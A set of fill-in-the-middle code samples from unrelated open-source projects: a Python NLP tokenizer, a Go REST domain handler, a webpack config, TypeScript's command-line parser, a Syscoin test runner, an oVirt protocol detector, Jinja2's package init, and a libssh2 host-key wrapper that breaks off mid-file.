if self.conf.get('global', 'tokenizer') == 'sts':
self.html_parser = HTMLParser()
self.hunpos = self.init_hunpos()
def init_hunpos(self):
hunpos_dir = self.conf.get('global', 'hunpos_dir')
hunpos_binary = os.path.join(hunpos_dir, 'hunpos-tag')
hunpos_model = os.path.join(hunpos_dir, 'en_wsj.model')
return nltk.tag.HunposTagger(hunpos_model, hunpos_binary)
def add_sentence(self, sentence, tags):
if not sentence in self.sentences:
tokens = self.tokenize_and_tag(sentence, tags)
# filter tokens if the config option remove_stopwords
# and/or remove_punctuation is set
filt_tokens = self.filter_tokens(tokens)
self.add_wordnet_senses(filt_tokens)
s = Sentence(sentence, filt_tokens)
self.sentences[hash(s)] = s
return self.sentences[hash(sentence)]
def add_wordnet_senses(self, tokens):
for token in tokens:
if self.conf.getboolean('wordnet', 'enrich_with_senses'):
token['senses'] = Wordnet.get_senses(token['token'], self.conf.getint('wordnet', 'sense_threshold'))
else:
token['senses'] = set([token['token']])
def filter_tokens(self, tokens):
new_tok = []
for token in tokens:
word = token['token']
if self.conf.getboolean('global', 'remove_stopwords') and word in Resources.stopwords:
continue
if self.conf.getboolean('global', 'remove_punctuation') and word in Resources.punctuation:
continue
if self.conf.getboolean('global', 'filter_frequent_adverbs') and Resources.is_frequent_adverb(word, token['pos']):
continue
new_tok.append(token)
return new_tok
def tokenize_and_tag(self, sentence, tags):
tokens = [{'token': t} for t in self.tokenize(sentence)]
if tags:
self.parse_tags(tokens, tags)
else:
if self.conf.get('global', 'tokenizer') == 'sts':
self.tag_tokens(tokens)
else:
self.dummy_tag_tokens(tokens)
if self.conf.getboolean('global', 'lower'):
for t in tokens:
t['token'] = t['token'].lower()
return tokens
def tokenize(self, sentence):
tok_method = self.conf.get('global', 'tokenizer')
if tok_method == 'simple':
return sentence.split(' ')
if tok_method == 'sts':
return self.sts_tokenize(sentence)
def sts_tokenize(self, sentence):
tokens = nltk.word_tokenize(self.html_parser.unescape(sentence))
toks = []
for tok in tokens:
if tok in Resources.punctuation:
toks.append(tok)
else:<|fim▁hole|>
def parse_tags(self, tokens, tags_str):
# match tags with tokens and skip tags if a token
# is missing (it was filtered by the tokenizer)
i = 0
for t in tags_str.split():
sp = t.split('/')
if not sp[0] == tokens[i]['token']:
continue
tokens[i]['ner'] = sp[1]
tokens[i]['pos'] = sp[2]
tokens[i]['chunk'] = sp[3]
i += 1
def dummy_tag_tokens(self, tokens):
for t in tokens:
t['pos'] = ''
t['ner'] = ''
t['chunk'] = ''
def tag_tokens(self, tokens):
words = [i['token'] for i in tokens]
pos_tags = self.hunpos.tag(words)
if self.conf.getboolean('penalty', 'penalize_named_entities'):
ne = nltk.ne_chunk(pos_tags)
ner_tags = self.get_ner_tags(ne)
else:
ner_tags = ['' for _ in range(len(tokens))]
for i, tag in enumerate(pos_tags):
tokens[i]['pos'] = tag
tokens[i]['ner'] = ner_tags[i]
def get_ner_tags(self, ne):
tags = []
for piece in ne:
if isinstance(piece, tuple):
tok, pos = piece
tags.append((pos, 'o'))
else:
ne_type = piece.label()
tags.append((piece[0][1], 'b-{0}'.format(ne_type)))
tags += [(tok[1], 'i-{0}'.format(ne_type)) for tok in piece[1:]]
return tags<|fim▁end|> | toks += Resources.punct_re.split(tok)
return filter(lambda x: x not in ('', 's'), toks) |
<|file_name|>domain.go<|end_file_name|><|fim▁begin|>// Copyright 2014 Rafael Dantas Justo. All rights reserved.
// Use of this source code is governed by a GPL
// license that can be found in the LICENSE file.
// Package handler store the REST handlers of specific URI
package handler
import (
"github.com/rafaeljusto/shelter/Godeps/_workspace/src/github.com/rafaeljusto/handy"
"github.com/rafaeljusto/shelter/Godeps/_workspace/src/gopkg.in/mgo.v2"
"github.com/rafaeljusto/shelter/dao"
"github.com/rafaeljusto/shelter/log"
"github.com/rafaeljusto/shelter/model"
"github.com/rafaeljusto/shelter/net/http/rest/interceptor"
"github.com/rafaeljusto/shelter/net/http/rest/messages"
"github.com/rafaeljusto/shelter/net/http/rest/protocol"
"net/http"
"strconv"
"strings"
"time"
)
func init() {
HandleFunc("/domain/{fqdn}", func() handy.Handler {
return new(DomainHandler)
})
}
// DomainHandler is responsable for keeping the state of a /domain/{fqdn} resource
type DomainHandler struct {
handy.DefaultHandler // Inject the HTTP methods that this resource does not implement
database *mgo.Database // Database connection of the MongoDB session
databaseSession *mgo.Session // MongoDB session
domain model.Domain // Domain object related to the resource
language *messages.LanguagePack // User preferred language based on HTTP header
FQDN string `param:"fqdn"` // FQDN defined in the URI
Request protocol.DomainRequest `request:"put"` // Domain request sent by the user
Response *protocol.DomainResponse `response:"get"` // Domain response sent back to the user
Message *protocol.MessageResponse `error` // Message on error sent to the user
}
func (h *DomainHandler) SetDatabaseSession(session *mgo.Session) {
h.databaseSession = session
}
func (h *DomainHandler) GetDatabaseSession() *mgo.Session {
return h.databaseSession
}
func (h *DomainHandler) SetDatabase(database *mgo.Database) {
h.database = database
}
func (h *DomainHandler) GetDatabase() *mgo.Database {
return h.database
}
func (h *DomainHandler) SetFQDN(fqdn string) {
h.FQDN = fqdn
}
func (h *DomainHandler) GetFQDN() string {
return h.FQDN
}
func (h *DomainHandler) SetDomain(domain model.Domain) {
h.domain = domain
}
func (h *DomainHandler) GetLastModifiedAt() time.Time {
return h.domain.LastModifiedAt
}
func (h *DomainHandler) GetETag() string {
return strconv.Itoa(h.domain.Revision)
}
func (h *DomainHandler) SetLanguage(language *messages.LanguagePack) {
h.language = language
}
func (h *DomainHandler) GetLanguage() *messages.LanguagePack {
return h.language
}
func (h *DomainHandler) MessageResponse(messageId string, roid string) error {
var err error
h.Message, err = protocol.NewMessageResponse(messageId, roid, h.language)
return err
}
func (h *DomainHandler) ClearResponse() {
h.Response = nil
}
func (h *DomainHandler) Get(w http.ResponseWriter, r *http.Request) {
h.retrieveDomain(w, r)
}
func (h *DomainHandler) Head(w http.ResponseWriter, r *http.Request) {
h.retrieveDomain(w, r)
}
// The HEAD method is identical to GET except that the server MUST NOT return a message-
// body in the response. But now the responsability for don't adding the body is from the
// mux while writing the response
func (h *DomainHandler) retrieveDomain(w http.ResponseWriter, r *http.Request) {
w.Header().Add("ETag", h.GetETag())
w.Header().Add("Last-Modified", h.GetLastModifiedAt().Format(time.RFC1123))
w.WriteHeader(http.StatusOK)
domainResponse := protocol.ToDomainResponse(h.domain, true)
h.Response = &domainResponse
}
func (h *DomainHandler) Put(w http.ResponseWriter, r *http.Request) {
// We need to set the FQDN in the domain request object because it is sent only in the
// URI and not in the domain request body to avoid information redudancy
h.Request.FQDN = h.GetFQDN()
var err error
if h.domain, err = protocol.Merge(h.domain, h.Request); err != nil {
messageId := ""
switch err {
case model.ErrInvalidFQDN:
messageId = "invalid-fqdn"
case protocol.ErrInvalidDNSKEY:
messageId = "invalid-dnskey"
case protocol.ErrInvalidDSAlgorithm:
messageId = "invalid-ds-algorithm"<|fim▁hole|> messageId = "invalid-ip"
case protocol.ErrInvalidLanguage:
messageId = "invalid-language"
}
if len(messageId) == 0 {
log.Println("Error while merging domain objects for create or "+
"update operation. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
} else {
if err := h.MessageResponse(messageId, r.URL.RequestURI()); err == nil {
w.WriteHeader(http.StatusBadRequest)
} else {
log.Println("Error while writing response. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
}
}
return
}
domainDAO := dao.DomainDAO{
Database: h.GetDatabase(),
}
if err := domainDAO.Save(&h.domain); err != nil {
if strings.Index(err.Error(), "duplicate key error index") != -1 {
if err := h.MessageResponse("conflict", r.URL.RequestURI()); err == nil {
w.WriteHeader(http.StatusConflict)
} else {
log.Println("Error while writing response. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
}
} else {
log.Println("Error while saving domain object for create or "+
"update operation. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
}
return
}
w.Header().Add("ETag", h.GetETag())
w.Header().Add("Last-Modified", h.GetLastModifiedAt().Format(time.RFC1123))
if h.domain.Revision == 1 {
w.Header().Add("Location", "/domain/"+h.domain.FQDN)
w.WriteHeader(http.StatusCreated)
} else {
w.WriteHeader(http.StatusNoContent)
}
}
func (h *DomainHandler) Delete(w http.ResponseWriter, r *http.Request) {
domainDAO := dao.DomainDAO{
Database: h.GetDatabase(),
}
if err := domainDAO.Remove(&h.domain); err != nil {
log.Println("Error while removing domain object. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
return
}
w.WriteHeader(http.StatusNoContent)
}
func (h *DomainHandler) Interceptors() handy.InterceptorChain {
return handy.NewInterceptorChain().
Chain(new(interceptor.Permission)).
Chain(interceptor.NewFQDN(h)).
Chain(interceptor.NewValidator(h)).
Chain(interceptor.NewDatabase(h)).
Chain(interceptor.NewDomain(h)).
Chain(interceptor.NewHTTPCacheBefore(h)).
Chain(interceptor.NewJSONCodec(h))
}<|fim▁end|> | case protocol.ErrInvalidDSDigestType:
messageId = "invalid-ds-digest-type"
case protocol.ErrInvalidIP: |
<|file_name|>shell.js<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public<|fim▁hole|> * License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
gTestsubsuite = 'Exceptions';<|fim▁end|> | |
<|file_name|>webpack.dev.config.js<|end_file_name|><|fim▁begin|>const path = require('path')
const HtmlWebpackPlugin = require('html-webpack-plugin')
module.exports = {
context: path.resolve(__dirname, '../src'),
entry: './index.js',
output: {
path: path.resolve(__dirname, '../dist'),
filename: 'index.js'
},<|fim▁hole|> module: {
rules: [
{
test: /\.san$/,
use: 'san-loader'
},
{
test: /\.js$/,
use: 'babel-loader',
exclude: /node_modules/
},
{
test: /\.css$/,
use: ['style-loader', 'css-loader']
},
{
test: /\.(png|jpe?g|gif|svg)(\?.*)?$/,
use: 'url-loader'
},
{
test: /\.(woff2?|eot|ttf)(\?.*)?$/,
use: 'url-loader'
}
]
},
resolve: {
alias: {
'@': path.resolve(__dirname, '../src')
}
},
plugins: [
new HtmlWebpackPlugin({
template: path.resolve(__dirname, '../src/template.html')
})
]
}<|fim▁end|> | |
<|file_name|>JUMISkinDeformer.java<|end_file_name|><|fim▁begin|>/*
* (C) Copyright 2015 Richard Greenlees
*
* Permission is hereby granted, free of charge, to any person obtaining a copy of this software
* and associated documentation files (the "Software"), to deal in the Software without restriction,
* including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
* subject to the following conditions:
*
* 1) The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
<|fim▁hole|> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
*/
package com.jumi.scene.objects;
/**
*
* @author RGreenlees
*/
public class JUMISkinDeformer {
String name;
public JUMISubDeformer[] deformers = new JUMISubDeformer[0];
public JUMISkinDeformer(String inName) {
name = inName;
}
public String toString() {
String result = "Skin Deformer " + name + ":";
for (int i = 0; i < deformers.length; i++) {
result = result + "\n\t" + deformers[i].name;
}
return result;
}
public JUMISubDeformer getSubDeformerByIndex(int index) {
if (index >= deformers.length) {
return null;
}
return deformers[index];
}
public JUMISubDeformer getSubDeformerByName(String inName) {
for (JUMISubDeformer a : deformers) {
if (a.name.equals(inName)) {
return a;
}
}
return null;
}
}<|fim▁end|> | |
<|file_name|>commandLineParser.ts<|end_file_name|><|fim▁begin|>/// <reference path="sys.ts"/>
/// <reference path="types.ts"/>
/// <reference path="core.ts"/>
/// <reference path="scanner.ts"/>
module ts {
var shortOptionNames: Map<string> = {
"d": "declaration",
"h": "help",
"m": "module",
"o": "out",
"t": "target",
"v": "version",
};
var options: CommandLineOption[] = [ //AR: curious why no error for rest cases, only for two cases where type was a record
{ name: "charset", type: "string" },
{ name: "codepage", type: "number" },
{ name: "declaration", type: "boolean" },
{ name: "diagnostics", type: "boolean" },
{ name: "help", type: "boolean" },
{ name: "locale", type: "string" },
{ name: "mapRoot", type: "string" },
{ name: "module", type: <any> { "commonjs": ModuleKind.CommonJS, "amd": ModuleKind.AMD }, error: Diagnostics.Argument_for_module_option_must_be_commonjs_or_amd },
{ name: "noImplicitAny", type: "boolean" },
{ name: "noLib", type: "boolean" },
{ name: "noLibCheck", type: "boolean" },
{ name: "noResolve", type: "boolean" },
{ name: "out", type: "string" },
{ name: "outDir", type: "string" },
{ name: "removeComments", type: "boolean" },
{ name: "sourceMap", type: "boolean" },
{ name: "sourceRoot", type: "string" },
{ name: "target", type: <any> { "es3": ScriptTarget.ES3, "es5": ScriptTarget.ES5 }, error: Diagnostics.Argument_for_target_option_must_be_es3_or_es5 },
{ name: "version", type: "boolean" }
];
// Map command line switches to compiler options' property descriptors. Keys must be lower case spellings of command line switches.
// The 'name' property specifies the property name in the CompilerOptions type. The 'type' property specifies the type of the option.
var optionDeclarations: Map<CommandLineOption> = {};
forEach(options, option => {
optionDeclarations[option.name.toLowerCase()] = option;
});
export function parseCommandLine(commandLine: string[]): ParsedCommandLine {
// Set default compiler option values
var options: CompilerOptions = {
target: ScriptTarget.ES3,
module: ModuleKind.None
};
var filenames: string[] = [];
var errors: Diagnostic[] = [];
parseStrings(commandLine);
return {
options: options,
filenames: filenames,
errors: errors
};
function parseStrings(args: string[]) {
var i = 0;
while (i < args.length) {
var s = args[i++];
if (s.charCodeAt(0) === CharacterCodes.at) {
parseResponseFile(s.slice(1));
}
else if (s.charCodeAt(0) === CharacterCodes.minus) {
s = s.slice(s.charCodeAt(1) === CharacterCodes.minus ? 2 : 1).toLowerCase();
// Try to translate short option names to their full equivalents.
if (hasProperty(shortOptionNames, s)) {
s = shortOptionNames[s];
}
if (hasProperty(optionDeclarations, s)) {
var opt = optionDeclarations[s];
// Check to see if no argument was provided (e.g. "--locale" is the last command-line argument).
if (!args[i] && opt.type !== "boolean") {
errors.push(createCompilerDiagnostic(Diagnostics.Compiler_option_0_expects_an_argument, opt.name));
}
<|fim▁hole|> case "number":
options[opt.name] = parseInt(args[i++]);
break;
case "boolean":
options[opt.name] = true;
break;
case "string":
options[opt.name] = args[i++] || "";
break;
// If not a primitive, the possible types are specified in what is effectively a map of options.
default:
var value = (args[i++] || "").toLowerCase();
//if (hasProperty(opt.type, value)) { //AR: this is not an IndexMap and hasOwnProperty will induce a checkAndTag to IndexMap
if (opt.type.hasOwnProperty(value)) {
options[opt.name] = opt.type[value];
}
else {
errors.push(createCompilerDiagnostic(opt.error));
}
}
}
else {
errors.push(createCompilerDiagnostic(Diagnostics.Unknown_compiler_option_0, s));
}
}
else {
filenames.push(s);
}
}
}
function parseResponseFile(filename: string) {
var text = sys.readFile(filename);
if (!text) {
errors.push(createCompilerDiagnostic(Diagnostics.File_0_not_found, filename));
return;
}
var args: string[] = [];
var pos = 0;
while (true) {
while (pos < text.length && text.charCodeAt(pos) <= CharacterCodes.space) pos++;
if (pos >= text.length) break;
var start = pos;
if (text.charCodeAt(start) === CharacterCodes.doubleQuote) {
pos++;
while (pos < text.length && text.charCodeAt(pos) !== CharacterCodes.doubleQuote) pos++;
if (pos < text.length) {
args.push(text.substring(start + 1, pos));
pos++;
}
else {
errors.push(createCompilerDiagnostic(Diagnostics.Unterminated_quoted_string_in_response_file_0, filename));
}
}
else {
while (text.charCodeAt(pos) > CharacterCodes.space) pos++;
args.push(text.substring(start, pos));
}
}
parseStrings(args);
}
}
}<|fim▁end|> |
switch (opt.type) {
|
<|file_name|>syscoin-util-test.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
# Copyright 2014 BitPay Inc.
# Copyright 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test framework for syscoin utils.
Runs automatically during `make check`.
Can also be run manually."""
import argparse
import binascii
import configparser
import difflib
import json
import logging
import os
import pprint
import subprocess
import sys
def main():
config = configparser.ConfigParser()
config.optionxform = str
config.read_file(open(os.path.join(os.path.dirname(__file__), "../config.ini"), encoding="utf8"))
env_conf = dict(config.items('environment'))
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
verbose = args.verbose
if verbose:
level = logging.DEBUG
else:
level = logging.ERROR
formatter = '%(asctime)s - %(levelname)s - %(message)s'
# Add the format/level to the logger
logging.basicConfig(format=formatter, level=level)
bctester(os.path.join(env_conf["SRCDIR"], "test", "util", "data"), "syscoin-util-test.json", env_conf)
def bctester(testDir, input_basename, buildenv):
""" Loads and parses the input file, runs all tests and reports results"""
input_filename = os.path.join(testDir, input_basename)
raw_data = open(input_filename, encoding="utf8").read()<|fim▁hole|> for testObj in input_data:
try:
bctest(testDir, testObj, buildenv)
logging.info("PASSED: " + testObj["description"])
except:
logging.info("FAILED: " + testObj["description"])
failed_testcases.append(testObj["description"])
if failed_testcases:
error_message = "FAILED_TESTCASES:\n"
error_message += pprint.pformat(failed_testcases, width=400)
logging.error(error_message)
sys.exit(1)
else:
sys.exit(0)
def bctest(testDir, testObj, buildenv):
"""Runs a single test, comparing output and RC to expected output and RC.
Raises an error if input can't be read, executable fails, or output/RC
are not as expected. Error is caught by bctester() and reported.
"""
# Get the exec names and arguments
execprog = os.path.join(buildenv["BUILDDIR"], "src", testObj["exec"] + buildenv["EXEEXT"])
execargs = testObj['args']
execrun = [execprog] + execargs
# Read the input data (if there is any)
stdinCfg = None
inputData = None
if "input" in testObj:
filename = os.path.join(testDir, testObj["input"])
inputData = open(filename, encoding="utf8").read()
stdinCfg = subprocess.PIPE
# Read the expected output data (if there is any)
outputFn = None
outputData = None
outputType = None
if "output_cmp" in testObj:
outputFn = testObj['output_cmp']
outputType = os.path.splitext(outputFn)[1][1:] # output type from file extension (determines how to compare)
try:
outputData = open(os.path.join(testDir, outputFn), encoding="utf8").read()
except:
logging.error("Output file " + outputFn + " can not be opened")
raise
if not outputData:
logging.error("Output data missing for " + outputFn)
raise Exception
if not outputType:
logging.error("Output file %s does not have a file extension" % outputFn)
raise Exception
# Run the test
proc = subprocess.Popen(execrun, stdin=stdinCfg, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
try:
outs = proc.communicate(input=inputData)
except OSError:
logging.error("OSError, Failed to execute " + execprog)
raise
if outputData:
data_mismatch, formatting_mismatch = False, False
# Parse command output and expected output
try:
a_parsed = parse_output(outs[0], outputType)
except Exception as e:
logging.error('Error parsing command output as %s: %s' % (outputType, e))
raise
try:
b_parsed = parse_output(outputData, outputType)
except Exception as e:
logging.error('Error parsing expected output %s as %s: %s' % (outputFn, outputType, e))
raise
# Compare data
if a_parsed != b_parsed:
logging.error("Output data mismatch for " + outputFn + " (format " + outputType + ")")
data_mismatch = True
# Compare formatting
if outs[0] != outputData:
error_message = "Output formatting mismatch for " + outputFn + ":\n"
error_message += "".join(difflib.context_diff(outputData.splitlines(True),
outs[0].splitlines(True),
fromfile=outputFn,
tofile="returned"))
logging.error(error_message)
formatting_mismatch = True
assert not data_mismatch and not formatting_mismatch
# Compare the return code to the expected return code
wantRC = 0
if "return_code" in testObj:
wantRC = testObj['return_code']
if proc.returncode != wantRC:
logging.error("Return code mismatch for " + outputFn)
raise Exception
if "error_txt" in testObj:
want_error = testObj["error_txt"]
# Compare error text
# TODO: ideally, we'd compare the strings exactly and also assert
# That stderr is empty if no errors are expected. However, syscoin-tx
# emits DISPLAY errors when running as a windows application on
# linux through wine. Just assert that the expected error text appears
# somewhere in stderr.
if want_error not in outs[1]:
logging.error("Error mismatch:\n" + "Expected: " + want_error + "\nReceived: " + outs[1].rstrip())
raise Exception
def parse_output(a, fmt):
"""Parse the output according to specified format.
Raise an error if the output can't be parsed."""
if fmt == 'json': # json: compare parsed data
return json.loads(a)
elif fmt == 'hex': # hex: parse and compare binary data
return binascii.a2b_hex(a.strip())
else:
raise NotImplementedError("Don't know how to compare %s" % fmt)
if __name__ == '__main__':
main()<|fim▁end|> | input_data = json.loads(raw_data)
failed_testcases = []
|
<|file_name|>ProtocolDetector.java<|end_file_name|><|fim▁begin|>package org.ovirt.engine.core.bll.transport;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import org.ovirt.engine.core.bll.Backend;
import org.ovirt.engine.core.common.businessentities.VDS;
import org.ovirt.engine.core.common.businessentities.VdsProtocol;
import org.ovirt.engine.core.common.businessentities.VdsStatic;
import org.ovirt.engine.core.common.config.Config;
import org.ovirt.engine.core.common.config.ConfigValues;
import org.ovirt.engine.core.common.interfaces.FutureVDSCall;
import org.ovirt.engine.core.common.vdscommands.FutureVDSCommandType;
import org.ovirt.engine.core.common.vdscommands.TimeBoundPollVDSCommandParameters;
import org.ovirt.engine.core.common.vdscommands.VDSReturnValue;
import org.ovirt.engine.core.dal.dbbroker.DbFacade;
import org.ovirt.engine.core.utils.transaction.TransactionMethod;
import org.ovirt.engine.core.utils.transaction.TransactionSupport;
import org.ovirt.engine.core.vdsbroker.ResourceManager;
/**
* We need to detect whether vdsm supports jsonrpc or only xmlrpc. It is confusing to users
* when they have cluster 3.5+ and connect to vdsm <3.5 which supports only xmlrpc.
* In order to present version information in such situation we need fallback to xmlrpc.
*
*/
public class ProtocolDetector {
private Integer connectionTimeout = null;
private Integer retryAttempts = null;
private VDS vds;
public ProtocolDetector(VDS vds) {
this.vds = vds;
this.retryAttempts = Config.<Integer> getValue(ConfigValues.ProtocolFallbackRetries);
this.connectionTimeout = Config.<Integer> getValue(ConfigValues.ProtocolFallbackTimeoutInMilliSeconds);
}
/**
* Attempts to connect to vdsm using a proxy from {@code VdsManager} for a host.
* There are 3 attempts to connect.
*
* @return <code>true</code> if connected or <code>false</code> if connection failed.
*/
public boolean attemptConnection() {
boolean connected = false;
try {
for (int i = 0; i < this.retryAttempts; i++) {
long timeout = Config.<Integer> getValue(ConfigValues.SetupNetworksPollingTimeout);
FutureVDSCall<VDSReturnValue> task =
Backend.getInstance().getResourceManager().runFutureVdsCommand(FutureVDSCommandType.TimeBoundPoll,
new TimeBoundPollVDSCommandParameters(vds.getId(), timeout, TimeUnit.SECONDS));
VDSReturnValue returnValue =
task.get(timeout, TimeUnit.SECONDS);
connected = returnValue.getSucceeded();
if (connected) {
break;
}
Thread.sleep(this.connectionTimeout);
}
} catch (TimeoutException | InterruptedException ignored) {<|fim▁hole|> }
return connected;
}
/**
* Stops {@code VdsManager} for a host.
*/
public void stopConnection() {
ResourceManager.getInstance().RemoveVds(this.vds.getId());
}
/**
* Fall back the protocol and attempts the connection {@link ProtocolDetector#attemptConnection()}.
*
* @return <code>true</code> if connected or <code>false</code> if connection failed.
*/
public boolean attemptFallbackProtocol() {
vds.setProtocol(VdsProtocol.XML);
ResourceManager.getInstance().AddVds(vds, false);
return attemptConnection();
}
/**
* Updates DB with fall back protocol (xmlrpc).
*/
public void setFallbackProtocol() {
final VdsStatic vdsStatic = this.vds.getStaticData();
vdsStatic.setProtocol(VdsProtocol.XML);
TransactionSupport.executeInNewTransaction(new TransactionMethod<Void>() {
@Override
public Void runInTransaction() {
DbFacade.getInstance().getVdsStaticDao().update(vdsStatic);
return null;
}
});
}
}<|fim▁end|> | |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
jinja2
~~~~~~<|fim▁hole|>
Jinja2 is a template engine written in pure Python. It provides a
Django inspired non-XML syntax but supports inline expressions and
an optional sandboxed environment.
Nutshell
--------
Here a small example of a Jinja2 template::
{% extends 'base.html' %}
{% block title %}Memberlist{% endblock %}
{% block content %}
<ul>
{% for user in users %}
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
{% endfor %}
</ul>
{% endblock %}
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
__docformat__ = 'restructuredtext en'
__version__ = '2.7.1'
# high level interface
from jinja2.environment import Environment, Template
# loaders
from jinja2.loaders import BaseLoader, FileSystemLoader, PackageLoader, \
DictLoader, FunctionLoader, PrefixLoader, ChoiceLoader, \
ModuleLoader
# bytecode caches
from jinja2.bccache import BytecodeCache, FileSystemBytecodeCache, \
MemcachedBytecodeCache
# undefined types
from jinja2.runtime import Undefined, DebugUndefined, StrictUndefined
# exceptions
from jinja2.exceptions import TemplateError, UndefinedError, \
TemplateNotFound, TemplatesNotFound, TemplateSyntaxError, \
TemplateAssertionError
# decorators and public utilities
from jinja2.filters import environmentfilter, contextfilter, \
evalcontextfilter
from jinja2.utils import Markup, escape, clear_caches, \
environmentfunction, evalcontextfunction, contextfunction, \
is_undefined
__all__ = [
'Environment', 'Template', 'BaseLoader', 'FileSystemLoader',
'PackageLoader', 'DictLoader', 'FunctionLoader', 'PrefixLoader',
'ChoiceLoader', 'BytecodeCache', 'FileSystemBytecodeCache',
'MemcachedBytecodeCache', 'Undefined', 'DebugUndefined',
'StrictUndefined', 'TemplateError', 'UndefinedError', 'TemplateNotFound',
'TemplatesNotFound', 'TemplateSyntaxError', 'TemplateAssertionError',
'ModuleLoader', 'environmentfilter', 'contextfilter', 'Markup', 'escape',
'environmentfunction', 'contextfunction', 'clear_caches', 'is_undefined',
'evalcontextfilter', 'evalcontextfunction'
]<|fim▁end|> | |
<|file_name|>host_key.hpp<|end_file_name|><|fim▁begin|>/**
@file
Host-key wrapper.
@if license
Copyright (C) 2010, 2013 Alexander Lamaison <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
In addition, as a special exception, the the copyright holders give you
permission to combine this program with free software programs or the
OpenSSL project's "OpenSSL" library (or with modified versions of it,
with unchanged license). You may copy and distribute such a system
following the terms of the GNU GPL for this program and the licenses
of the other code concerned. The GNU General Public License gives
permission to release a modified version without this exception; this
exception also makes it possible to release a modified version which
carries forward this exception.
@endif
*/
#ifndef SSH_HOST_KEY_HPP
#define SSH_HOST_KEY_HPP
#include <ssh/detail/session_state.hpp>
#include <boost/foreach.hpp> // BOOST_FOREACH
#include <boost/shared_ptr.hpp> // shared_ptr
#include <boost/throw_exception.hpp> // BOOST_THROW_EXCEPTION
#include <sstream> // ostringstream
#include <stdexcept> // invalid_argument
#include <string>
#include <utility> // pair
#include <vector>
#include <libssh2.h>
namespace ssh
{
namespace detail
{
/**
* Thin wrapper around libssh2_session_hostkey.
*/
inline std::pair<std::string, int> hostkey(session_state& session)
{
// Session owns the string.
// Lock until we finish copying the key string from the session. I
// don't know if other calls to the session are currently able to
// change it, but they might one day.
// Locking it for the duration makes it thread-safe either way.
detail::session_state::scoped_lock lock = session.aquire_lock();
size_t len = 0;
int type = LIBSSH2_HOSTKEY_TYPE_UNKNOWN;
const char* key =
libssh2_session_hostkey(session.session_ptr(), &len, &type);
if (key)
return std::make_pair(std::string(key, len), type);
else
return std::make_pair(std::string(), type);
}
/**
* Thin wrapper around libssh2_hostkey_hash.
*
* @param T Type of collection to return. Sensible examples
* include std::string or std::vector<unsigned char>.
* @param session libssh2 session pointer
* @param hash_type Hash method being requested.
*/
template <typename T>
inline T hostkey_hash(session_state& session, int hash_type)
{
// Session owns the data.
// Lock until we finish copying the key hash bytes from the session. I
// don't know if other calls to the session are currently able to
// change it, but they might one day.
// Locking it for the duration makes it thread-safe either way.
detail::session_state::scoped_lock lock = session.aquire_lock();
const T::value_type* hash_bytes = reinterpret_cast<const T::value_type*>(
::libssh2_hostkey_hash(session.session_ptr(), hash_type));
size_t len = 0;
if (hash_type == LIBSSH2_HOSTKEY_HASH_MD5)
len = 16;
else if (hash_type == LIBSSH2_HOSTKEY_HASH_SHA1)
len = 20;
else
BOOST_THROW_EXCEPTION(std::invalid_argument("Unknown hash type"));
if (hash_bytes)
return T(hash_bytes, hash_bytes + len);
else
return T();
}
/**
* Thin wrapper around libssh2_session_methods.
*/
inline std::string method(session_state& session, int method_type)
{
// Session owns the string.
// Lock until we finish copying the string from the session. I
// don't know if other calls to the session are currently able to
// change it, but they might one day.
// Locking it for the duration makes it thread-safe either way.
detail::session_state::scoped_lock lock = session.aquire_lock();
const char* key_type =
libssh2_session_methods(session.session_ptr(), method_type);
if (key_type)
return std::string(key_type);
else
return std::string();
}
}
/**
* Possible types of host-key algorithm.
*/
struct hostkey_type
{
enum enum_t
{
unknown,
rsa1,
ssh_rsa,
ssh_dss
};
};
namespace detail
{
/**
* Convert the returned key-type from libssh2_session_hostkey into a value from
* the hostkey_type enum.
*/
inline hostkey_type::enum_t type_to_hostkey_type(int type)
{
switch (type)
{
case LIBSSH2_HOSTKEY_TYPE_RSA:
return hostkey_type::ssh_rsa;
case LIBSSH2_HOSTKEY_TYPE_DSS:
return hostkey_type::ssh_dss;
default:
return hostkey_type::unknown;
}
}
}
/**
* Class representing the session's current negotiated host-key.
*
* As well as the raw key itself, this class provides MD5 and SHA1 hashes and
* key metadata.
*/
class host_key
{
public:
explicit host_key(detail::session_state& session)
: // We pull everything out of the session here and store it to avoid
// instances of this class depending on the lifetime of the session
m_key(detail::hostkey(session)),
m_algorithm_name(detail::method(session, LIBSSH2_METHOD_HOSTKEY)),
m_md5_hash(detail::hostkey_hash<std::vector<unsigned char>>(
session, LIBSSH2_HOSTKEY_HASH_MD5)),
m_sha1_hash(detail::hostkey_hash<std::vector<unsigned char>>(
session, LIBSSH2_HOSTKEY_HASH_SHA1))
{
}
/**
